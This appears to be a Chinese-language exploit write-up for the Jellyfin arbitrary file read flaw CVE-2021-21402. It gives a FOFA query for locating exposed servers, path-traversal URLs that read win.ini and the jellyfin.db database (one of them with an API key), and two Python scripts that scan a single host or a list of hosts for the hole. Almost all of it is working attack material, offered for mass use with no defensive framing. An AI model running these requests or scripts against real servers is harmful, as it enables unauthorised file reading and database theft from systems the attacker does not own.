Jellyfin任意文件读取漏洞（CVE-2021-21402）

FOFA语句：

title="Jellyfin"

 

可以通过访问

http://<url>/Audio/anything/hls/<文件路径>/stream.mp3/

　　

读取任意文件。

 

POC：

http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/

Content-Type: application/octet-stream

 

其它URL：

/Audio/anything/hls/..\data\jellyfin.db/stream.mp3/
/Videos/anything/hls/m/..\data\jellyfin.db
/Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7

　　

 

batch.py（python3）

#批量ip
import requests
import sys
import urllib3
urllib3.disable_warnings()

if len(sys.argv)!=2:
    print('Usage: python3  xxx.py  urls.txt')
    sys.exit()
txt= sys.argv[1]
f=open(txt,'r+')
for i in f.readlines():   
    url=i.strip()
    url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
    headers = {
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
                "Content-Type": "application/octet-stream"
	}
    response=requests.get(url,headers=headers,verify=False)
    if response.status_code==200:
        print(url+"  "+"存在漏洞")
    
    else:
        print(url+"  "+"不存在漏洞")

　　

single.py（python3）

#单个ip
import requests
import sys
import urllib3
urllib3.disable_warnings()

if len(sys.argv)!=2:   
    print('Usage: python3  xxx.py  http://xxx.xxx.xxx.xxx ')
    sys.exit()
url= sys.argv[1]
url=url+"/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
headers = {
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36',
                "Content-Type": "application/octet-stream"
	}
response=requests.get(url,headers=headers,verify=False)
if response.status_code==200:
    print("存在漏洞")
    
else:
    print("不存在漏洞")